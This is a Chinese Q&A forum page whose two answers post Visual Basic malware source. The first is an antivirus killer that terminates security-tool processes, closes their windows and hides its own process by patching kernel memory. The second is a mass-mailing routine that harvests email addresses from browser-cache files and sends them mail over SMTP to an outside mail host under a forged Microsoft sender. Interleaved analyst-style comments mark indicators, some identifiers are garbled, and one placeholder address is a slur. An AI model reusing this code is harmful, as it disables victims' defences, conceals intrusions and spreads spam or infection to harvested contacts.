发布网友 发布时间:2022-04-20 08:49
共2个回答
热心网友 时间:2022-07-13 00:42
全都放在标准模块中,不要有窗体,启动设置为Sub_main,就行了。这段代码可以干掉常见的反病毒软件,包括冰刃、Autoruns、Sreng、瑞星、卡巴、江民、金山、NOD32等,还开放被感染机器的后门,便于进一步入侵。(下面贴出的代码在 OpenPhysicalMemory 处被截断,后门部分不在其中。)
Option Explicit
Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long
Declare Function TerminateProcess Lib "kernel32.dll" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Declare Function EnumWindows Lib "user32.dll" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Declare Function SetForegroundWindow Lib "user32" (ByVal hwnd As Long) As Long
Declare Sub Sleep Lib "kernel32.dll" (ByVal dwMilliseconds As Long)
Const PROCESS_ALL_ACCESS As Long = &HFFF
Const WM_CLOSE = &H10
Public Const REG_SZ = 1
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const ERROR_SUCCESS = 0&
Public KEY_ALL_ACCESS As Double
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function CopyFile Lib "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Public Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Public Const STATUS_ACCESS_DENIED = &HC0000022
Public Const STATUS_INVALID_HANDLE = &HC0000008
Public Const SECTION_MAP_WRITE = &H2
Public Const SECTION_MAP_READ = &H4
Public Const READ_CONTROL = &H20000
Public Const WRITE_DAC = &H40000
Public Const NO_INHERITANCE = 0
Public Const DACL_SECURITY_INFORMATION = &H4
Public Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
Public Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
Public Const OBJ_INHERIT = &H2
Public Const OBJ_PERMANENT = &H10
Public Const OBJ_EXCLUSIVE = &H20
Public Const OBJ_CASE_INSENSITIVE = &H40
Public Const OBJ_OPENIF = &H80
Public Const OBJ_OPENLINK = &H100
Public Const OBJ_KERNEL_HANDLE = &H200
Public Const OBJ_VALID_ATTRIBUTES = &H3F2
Public Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
Public Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Public Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Public Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long
Public Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Public Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
Public Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Public Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Public Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Public Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Public Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long
Public Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Public verinfo As OSVERSIONINFO
Public g_hNtDLL As Long
Public g_pMapPhysicalMemory As Long
Public g_hMPM As Long
Public aByte(3) As Byte
Public Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Public Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum
Public Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum
Public Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum
Public Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type
Public Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type
Public Type AceArray
List() As EXPLICIT_ACCESS
End Type
Public Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Public Type LARGE_INTEGER
lowpart As Long
highpart As Long
End Type
Public Const ANYSIZE_ARRAY As Long = 1
Public Const SE_PRIVILEGE_ENABLED As Long = &H2
Public Const TOKEN_ADJUST_PRIVILEGES As Long = &H20
Public Const TOKEN_QUERY As Long = &H8
Public Type LUID_AND_ATTRIBUTES
LUID As LARGE_INTEGER
Attributes As Long
End Type
Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type
Public Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, ByRef lpLuid As LARGE_INTEGER) As Long
Public Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, ByRef NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, ByRef PreviousState As Long, ByRef ReturnLength As Long) As Long
Public Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
Public Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Public Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Long
Public Declare Function GetLastError Lib "kernel32.dll" () As Long
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Thread32First Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpte As THREADENTRY32) As Long
Public Declare Function Thread32Next Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpte As THREADENTRY32) As Long
Public Declare Function Mole32First Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lppe As MODULEENTRY32) As Long
Public Declare Function Mole32Next Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpme As MODULEENTRY32) As Long
Public Declare Function TerminateThread Lib "kernel32" (ByVal hThread As Long, ByVal dwExitCode As Long) As Long
Public Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwThreadId As Long) As Long
Public Const TH32CS_SNAPPROCESS = &H2
Public Const TH32CS_SNAPTHREAD = &H4
Public Const TH32CS_SNAPMODULE As Long = &H8
Public Const PROCESS_TERMINATE As Long = (&H1)
Public Const MAX_PATH As Integer = 260
Public Type PROCESSENTRY32
dwsize As Long
cntusage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32MoleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Public Type MODULEENTRY32 '模块
dwsize As Long
th32MoleID As Long
th32ProcessID As Long
GlblcntUsage As Long
ProccntUsage As Long
modBaseAddr As Byte
modBaseSize As Long
hMole As Long
szMole As String * 256
szExePath As String * 1024
End Type
Public Type THREADENTRY32 '线程
dwsize As Long
cntusage As Long
th32threadID As Long
th32OwnerProcessID As Long
tpBasePri As Long
tpDeltaPri As Long
dwFlags As Long
End Type
' Terminates the threads of one process.
' ProcessID: ID of the process whose threads are targeted.
' Returns True when the last TerminateThread call made in the loop returned
' non-zero (r is overwritten on every iteration, so earlier results are lost).
' Analyst note: KillProcess calls this as a fallback when TerminateProcess fails.
Public Function KillThread(ByVal ProcessID As Long) As Boolean
Dim hThread As Long, r As Long, i As Long
Dim TList() As THREADENTRY32
' Thread entries owned by ProcessID, collected from a Toolhelp snapshot.
TList = GetThreadList(ProcessID)
For i = 0 To UBound(TList)
With TList(i)
hThread = OpenThread(PROCESS_TERMINATE, False, .th32threadID) ' open the thread (original comment: "get the process handle")
If hThread <> 0 Then
r = TerminateThread(hThread, 0) ' terminate it (original comment: "close the process")
End If
End With
Next
KillThread = r <> 0
End Function
' Terminates every process whose image name matches ProcessName, or that has a
' module of that name loaded (checked through InMole).
' ProcessName: name compared case-insensitively against each szExeFile.
' bKillThread: when True, a failed TerminateProcess is followed by KillThread
'              on the same PID and a second TerminateProcess attempt.
' The function never assigns its own return value, so callers always get False.
' Defender view: this is the tool-termination primitive of the listing. The
' visible sequence is Toolhelp process snapshot -> OpenProcess requesting
' PROCESS_TERMINATE -> TerminateProcess; the names it is called with are not
' in the visible part of the page.
Public Function KillProcess(ByVal ProcessName As String, Optional ByVal bKillThread As Boolean) As Boolean
Dim hProcess As Long, r As Long
Dim PList() As PROCESSENTRY32
Dim Name As String, i As Long
PList = GetProcessList
For i = 0 To UBound(PList)
With PList(i)
' szExeFile is a fixed-length buffer; keep the text before the first NUL.
Name = Left(.szExeFile, InStr(1, .szExeFile, vbNullChar) - 1)
DoEvents
' r doubles as the "module match" flag here and as the API result below.
r = InMole(.th32ProcessID, ProcessName)
If LCase(Trim(Name)) = LCase(Trim(ProcessName)) Or r Then
hProcess = OpenProcess(PROCESS_TERMINATE, False, .th32ProcessID) ' get the process handle
If hProcess <> 0 Then
r = TerminateProcess(hProcess, 0) ' terminate the process
If Not (r) Then
If bKillThread Then
Call KillThread(.th32ProcessID)
End If
r = TerminateProcess(hProcess, 0) ' terminate the process (second attempt)
End If
End If
End If
End With
Next
End Function
' Returns the THREADENTRY32 records of the threads owned by ProcessID.
' Takes a TH32CS_SNAPTHREAD snapshot, walks it with Thread32First/Thread32Next
' and keeps the entries whose th32OwnerProcessID equals ProcessID.
' Note that this is not a pure query: for every matching entry it also calls
' TerminateThread, passing the thread ID value itself rather than a handle
' returned by OpenThread.
' If no entry matches, TList is returned without ever being dimensioned.
Public Function GetThreadList(ByVal ProcessID As Long) As THREADENTRY32()
Dim i As Long
Dim TList() As THREADENTRY32
Dim TE32 As THREADENTRY32
Dim hThreadSnap As Long
Dim TheLoop As Long
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, ProcessID)
' The API requires the structure size to be filled in before the first call.
TE32.dwsize = Len(TE32)
TheLoop = Thread32First(hThreadSnap, TE32)
While TheLoop <> 0
If TE32.th32OwnerProcessID = ProcessID Then
ReDim Preserve TList(i)
TerminateThread TE32.th32threadID, 0
TList(i) = TE32
i = i + 1
End If
TheLoop = Thread32Next(hThreadSnap, TE32)
Wend
CloseHandle hThreadSnap
GetThreadList = TList
End Function
' Returns one PROCESSENTRY32 record per process in a TH32CS_SNAPPROCESS
' Toolhelp snapshot. The array grows by one element per entry; the snapshot
' handle is closed before returning.
Public Function GetProcessList() As PROCESSENTRY32()
Dim i As Long
Dim PList() As PROCESSENTRY32
Dim PE32 As PROCESSENTRY32
Dim hProcessSnap As Long
Dim TheLoop As Long
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
' The API requires the structure size to be filled in before the first call.
PE32.dwsize = Len(PE32)
TheLoop = Process32First(hProcessSnap, PE32)
While TheLoop <> 0
ReDim Preserve PList(i)
PList(i) = PE32
i = i + 1
TheLoop = Process32Next(hProcessSnap, PE32)
Wend
CloseHandle hProcessSnap
GetProcessList = PList
End Function
' Returns the MODULEENTRY32 records of a TH32CS_SNAPMODULE snapshot taken for
' ProcessID, one array element per entry.
' NOTE(review): the "Mole" identifiers used here are spelled exactly as on the
' page; they look damaged by the site's text extraction and are left as published.
Public Function GetMoleList(ByVal ProcessID As Long) As MODULEENTRY32()
Dim i As Long
Dim MList() As MODULEENTRY32
Dim ME32 As MODULEENTRY32
Dim hMoleSnap As Long
Dim TheLoop As Long
hMoleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, ProcessID)
' The API requires the structure size to be filled in before the first call.
ME32.dwsize = Len(ME32)
TheLoop = Mole32First(hMoleSnap, ME32)
While TheLoop <> 0
ReDim Preserve MList(i)
MList(i) = ME32
i = i + 1
TheLoop = Mole32Next(hMoleSnap, ME32)
Wend
CloseHandle hMoleSnap
GetMoleList = MList
End Function
' Reports whether the process ProcessID has a module whose name equals MoleName
' (case-insensitive comparison against each entry's szMole text).
' Any runtime error (for example an empty module list) jumps to the Err label,
' so the function then returns its default value, False.
' KillProcess uses the result to treat a process as a target even when its
' image name does not match.
Public Function InMole(ByVal ProcessID As Long, ByVal MoleName As String) As Boolean
Dim i As Long
Dim MList() As MODULEENTRY32
Dim Name As String
On Error GoTo Err:
MList = GetMoleList(ProcessID)
For i = 0 To UBound(MList)
With MList(i)
' szMole is a fixed-length buffer; keep the text before the first NUL.
Name = Left(.szMole, InStr(1, .szMole, vbNullChar) - 1)
If LCase(Name) = LCase(MoleName) Then
InMole = True
Exit For
End If
End With
Next
Err:
End Function
' Tries to enable SeDebugPrivilege in the current process token.
' Steps: OpenProcessToken on the current process with TOKEN_ADJUST_PRIVILEGES
' Or TOKEN_QUERY, LookupPrivilegeValue for "SeDebugPrivilege", then
' AdjustTokenPrivileges with SE_PRIVILEGE_ENABLED.
' Returns True only when GetLastError reads 0 right after AdjustTokenPrivileges;
' every other path leaves the default False.
' Defender view: with this privilege enabled a process can open other processes
' regardless of their DACL, which is what the termination routines in this
' listing rely on; token privilege adjustments are auditable on Windows.
Function EnableDebugPrivilege() As Boolean
Dim TP As TOKEN_PRIVILEGES
Dim hToken As Long, r As Long, e As Long
r = OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
e = GetLastError
' Err.Raise 6
' The guard below is a bitwise expression on the two Long values, as written.
If r And Not e Then
r = LookupPrivilegeValue(vbNullString, "SeDebugPrivilege", TP.Privileges(0).LUID)
e = GetLastError
If r And Not e Then
TP.PrivilegeCount = 1
TP.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
r = AdjustTokenPrivileges(hToken, False, TP, LenB(TP), 0, 0)
EnableDebugPrivilege = GetLastError = 0
End If
End If
Call CloseHandle(hToken)
End Function
' Window-enumeration callback (signature matches what EnumWindows expects):
' reads the title of hwnd and closes windows that look like security or
' system-inspection tools.
' Always returns True, so the enumeration continues over all windows.
' As published, only the first heuristic can execute: the statement directly
' after label No1 is an unconditional "GoTo AllOk", so the Autoruns, Process
' Explorer, Task Manager and keyword checks further down are never reached.
' Defender view: the title strings below are the indicator set of this sample.
Public Function EnumWindowsProc(ByVal hwnd As Long, ByVal lParam As Long) As Boolean
Dim sSave As String, Ret As Long, IsIceSword As Boolean, IsAutoruns As Boolean, IsProcexp As Boolean, IsTaskmgr As Boolean, Other As Boolean, i As Long
' Fetch the window title into a buffer sized from GetWindowTextLength.
Ret = GetWindowTextLength(hwnd)
sSave = Space(Ret)
GetWindowText hwnd, sSave, Ret + 1
IsIceSword = True
IsAutoruns = True
IsProcexp = True
IsTaskmgr = True
Other = True
' Heuristic 1: a title of 6 to 16 characters whose last six characters are all
' hexadecimal digits (0-9, A-F). The flag name suggests it targets IceSword.
If Len(sSave) < 6 Or Len(sSave) > 16 Then
IsIceSword = False
GoTo No1
End If
For i = Len(sSave) - 5 To Len(sSave)
If (Mid(sSave, i, 1) <> "0") And (Mid(sSave, i, 1) <> "1") And (Mid(sSave, i, 1) <> "2") And (Mid(sSave, i, 1) <> "3") And (Mid(sSave, i, 1) <> "4") And (Mid(sSave, i, 1) <> "5") And (Mid(sSave, i, 1) <> "6") And (Mid(sSave, i, 1) <> "7") And (Mid(sSave, i, 1) <> "8") And (Mid(sSave, i, 1) <> "9") And (Mid(sSave, i, 1) <> "A") And (Mid(sSave, i, 1) <> "B") And (Mid(sSave, i, 1) <> "C") And (Mid(sSave, i, 1) <> "D") And (Mid(sSave, i, 1) <> "E") And (Mid(sSave, i, 1) <> "F") Then IsIceSword = False
Next
If IsIceSword Then
' Close request, then synthetic Enter and Alt+F4 keystrokes sent to the window.
PostMessage hwnd, WM_CLOSE, 0, 0
SendKeys "{Enter}"
SetForegroundWindow hwnd
SendKeys "%{F4}"
End If
No1:
GoTo AllOk
' Heuristic 2 (unreachable as published): title starting with "Autoruns".
If Len(sSave) < 8 Then
IsAutoruns = False
GoTo No2
End If
If Mid(sSave, 1, 8) <> "Autoruns" Then IsAutoruns = False
If IsAutoruns Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
No2:
GoTo AllOk
' Heuristic 3 (unreachable as published): title starting with "Process Explorer".
If Len(sSave) < 16 Then
IsProcexp = False
GoTo No3
End If
If Mid(sSave, 1, 16) <> "Process Explorer" Then IsProcexp = False
If IsProcexp Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
No3:
GoTo AllOk
' Heuristic 4 (unreachable as published): the Chinese-locale Task Manager title.
If sSave <> "Windows 任务管理器" Then IsTaskmgr = False
If IsTaskmgr Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
GoTo AllOk
' Heuristic 5 (unreachable as published): case-insensitive substring match on
' security-related words and product names. The Chinese literals mean, in order:
' antivirus, virus, dedicated removal tool, registry, process, Rising, Duba,
' Jiangmin, Kaspersky, IceSword, virus scan, run.
If InStr(1, sSave, "杀毒", vbTextCompare) <> 0 Or InStr(1, sSave, "病毒", vbTextCompare) <> 0 Or InStr(1, sSave, "专杀", vbTextCompare) <> 0 Or InStr(1, sSave, "注册表", vbTextCompare) <> 0 Or InStr(1, sSave, "Anti", vbTextCompare) <> 0 Or InStr(1, sSave, "进程", vbTextCompare) <> 0 Or InStr(1, sSave, "瑞星", vbTextCompare) <> 0 Or InStr(1, sSave, "毒霸", vbTextCompare) <> 0 Or _
InStr(1, sSave, "江民", vbTextCompare) <> 0 Or InStr(1, sSave, "卡巴斯基", vbTextCompare) <> 0 Or InStr(1, sSave, "NOD32", vbTextCompare) <> 0 Or InStr(1, sSave, "McAfee", vbTextCompare) <> 0 Or InStr(1, sSave, "BitDefender", vbTextCompare) <> 0 Or InStr(1, sSave, "avast", vbTextCompare) <> 0 Or InStr(1, sSave, "Kill", vbTextCompare) <> 0 Or InStr(1, sSave, "Virus", vbTextCompare) <> 0 _
Or InStr(1, sSave, "Kaspersky", vbTextCompare) <> 0 Or InStr(1, sSave, "冰刃", vbTextCompare) <> 0 Or InStr(1, sSave, "Autorun", vbTextCompare) <> 0 Or InStr(1, sSave, "sreng", vbTextCompare) <> 0 Or InStr(1, sSave, "查毒", vbTextCompare) <> 0 Or InStr(1, sSave, "运行", vbTextCompare) <> 0 Then PostMessage hwnd, WM_CLOSE, 0, 0
AllOk:
EnumWindowsProc = True
End Function
' Attempts to hide the current process by editing kernel memory from user mode.
' The structure offsets are chosen only when GetVersionEx reports platform 2
' with version 5.0 or 5.1 (Windows 2000 / XP); on any other version the three
' offsets stay 0.
' If OpenPhysicalMemory succeeds it reads a chain of pointers through GetData,
' starting at a fixed address, to reach the forward and backward link values of
' the current process record, then uses SetData so that the two neighbouring
' entries point at each other, removing this record from the doubly-linked list.
' GetData and SetData are not defined in the visible part of the page, and
' OpenPhysicalMemory is cut off.
' Defender view: this depends on user-mode access to the physical-memory
' section object, which later Windows releases no longer allow; a process
' unlinked this way still exists and can be found by tools that do not rely on
' that one list (cross-view comparison).
Public Sub HideCurrentProcess()
' Hide the current application's process in the process list
Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = &HA0
lOffsetBlink = &HA4
lOffsetPID = &H9C
Case 1
lOffsetFlink = &H88
lOffsetBlink = &H8C
lOffsetPID = &H84
End Select
End If
End If
End If
If OpenPhysicalMemory <> 0 Then
thread = GetData(&HFFDFF124)
process = GetData(thread + &H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
' Unlink: the next entry's back pointer and the previous entry's forward pointer.
SetData fw + 4, bw
SetData bw, fw
CloseHandle g_hMPM
End If
End Sub
' Rewrites the DACL of the section object hSection so that the current user is
' granted SECTION_MAP_WRITE.
' Steps: GetSecurityInfo reads the existing DACL, an EXPLICIT_ACCESS entry for
' the trustee name "CURRENT_USER" is merged into it with SetEntriesInAcl, and
' SetSecurityInfo applies the new DACL. No return value of these calls is checked.
' The security descriptor and the new ACL are released with LocalFree.
' Defender view: this is a permission change on a kernel object made by an
' ordinary user-mode program; the caller is not in the visible part of the page
' (presumably OpenPhysicalMemory, which is cut off - TODO confirm).
Public Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS
GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD
ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
SetEntriesInAcl 1, ea, pDacl, pNewDacl
SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0
CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub
Public Function OpenPhysicalMemory() As Long
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES
RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory"
热心网友 时间:2022-07-13 00:42
object = "<248dd0-bb45-11cf-9abc-0080c7e7b78d>#1.0#0"; "mswinsck.ocx"
begin vb.form form1
caption = "form1"
clientheight = 3195
clientleft = 60
clienttop = 345
clientwidth = 4680
linktopic = "form1"
scaleheight = 3195
scalewidth = 4680
startupposition = 3 windows default
begin mswinsocklib.winsock winsock1
left = 1200
top = 840
_extentx = 741
_extenty = 741
_version = 393216
end
end
attribute vb_name = "form1"
attribute vb_globalnamespace = false
attribute vb_creatable = false
attribute vb_predeclaredid = true
attribute vb_exposed = false
option explicit
private response as string
private declare sub sleep lib "kernel32" (byval dwmilliseconds as long)
private declare function shgetspecialfolderlocation lib "shell32.dll" (byval hwndowner as long, byval nfolder as long, pidl as itemidlist) as long
private declare function shgetpathfromidlist lib "shell32.dll" alias "shgetpathfromidlista" (byval pidl as long, byval pszpath as string) as long
const csidl_tif = &h20
private type shitemid
cb as long
abid as byte
end type
private type itemidlist
mkid as shitemid
end type
' Entry point of the second listing: runs the whole harvest-and-send cycle once
' when the form loads, then unloads the form.
' Sequence: delete the scratch file c:\t.txt, collect addresses from the folder
' returned for csidl_tif (&h20) into that file via listht, then call transmit
' against the hard-coded host mail.lycos.com.
' All errors are suppressed by "on error resume next".
' Defender view: the scratch file path and the mail host are fixed indicators.
private sub form_load()
on error resume next
kill "c:\t.txt"
listht getspecialfolder(csidl_tif)
transmit ("mail.lycos.com")
unload me
end sub
' Drives a raw SMTP conversation through the winsock1 control.
' b8: host name to connect to on TCP port 25.
' Sequence while the socket is closed: connect, greet with "helo localhost",
' give a fixed microsoft.com sender address, read the harvested address list
' from c:\t.txt, issue one recipient command per ";"-separated entry, then send
' the headers from hd, a one-line HTML body, the attachment part from a12 and
' the end-of-data marker, and finally quit. Each step waits in w4c for the
' expected reply code. Returns true after the conversation, nothing otherwise.
' Entries that are empty, lack "@" or contain "?" are replaced by fixed
' placeholder addresses before being used.
' NOTE(review): some string literals here (for example the recipient command)
' look truncated by the site's text extraction; they are left as published.
' Defender view: a desktop process speaking SMTP directly to an external host
' on port 25, with a forged vendor sender address, is the network signature.
function transmit(byval b8 as string)
dim q as string, a as string, textline as string
dim www, ggg
winsock1.localport = 0
if winsock1.state = sckclosed then
winsock1.protocol = scktcpprotocol
winsock1.remotehost = b8
winsock1.remoteport = 25
winsock1.connect
w4c ("220")
winsock1.senddata "helo localhost" & vbcrlf
w4c ("250")
winsock1.senddata "mail from:" & " <" + "webmaster@microsoft.com" + ">" & vbcrlf
w4c ("250")
' Load the whole harvested list into q as one string.
open "c:\t.txt" for input as #1
do while not eof(1)
line input #1, textline
q = q & textline
loop
close #1
a = trim(q)
www = split(a, ";")
for each ggg in www
if ggg = "" then
ggg = "blah@h.net"
end if
if instr(1, ggg, "@") then
else
ggg = "faggot@fillme.com"
end if
if instr(1, ggg, "?") then
ggg = "juana12234@yahoo.com"
end if
winsock1.senddata "rcpt t " & "<" & ggg & ">" & vbcrlf
w4c ("250")
next ggg
winsock1.senddata "data" & vbcrlf
w4c ("354")
winsock1.senddata hd & vbcrlf
winsock1.senddata "<html>this is a checking for your system from microsoft.com....</html>" & vbcrlf
winsock1.senddata a12()
winsock1.senddata vbcrlf & "." & vbcrlf
w4c ("250")
winsock1.senddata "quit" & vbcrlf
w4c ("221")
winsock1.close
transmit = true
else
end if
end function
' Winsock event handler: copies whatever the server sent into the module-level
' response string, which w4c polls.
private sub winsock1_dataarrival(byval bytestotal as long)
winsock1.getdata response
end sub
' Waits for a server reply that starts with responsecode.
' responsecode: the three-character SMTP status expected next.
' First loop: spins (doevents + 1 ms sleep) until response is non-empty.
' Second loop: spins until the first three characters of response equal
' responsecode. Both loops carry an early exit keyed on ttt, which is computed
' as tt - timer in the first loop only.
' On normal completion response is cleared for the next command.
private sub w4c(responsecode as string)
dim tt as single
dim ttt as single
tt = timer
while len(response) = 0
ttt = tt - timer
doevents
if ttt > 24 then
exit sub
end if
sleep 1
wend
while left(response, 3) <> responsecode
doevents
if ttt > 50 then
exit sub
end if
sleep 1
wend
response = ""
end sub
' Recursively harvests addresses from the subfolders of dir.
' For every subfolder it calls infht to extract addresses from that folder's
' HTML files, recurses into the subfolder, and accumulates the results as a
' ";"-separated string; a fixed placeholder is used when a folder yields nothing.
' The accumulated string is appended to c:\t.txt (each recursion level appends
' its own line). Errors are suppressed by "on error resume next".
' Defender view: bulk reads of cached .htm/.html files followed by writes to a
' fixed file in the drive root are the file-system trace of this routine.
sub listht(dir)
on error resume next
dim fso, ssfh, filh, s, f, d, q, a, textline
set fso = createobject("scripting.filesystemobject")
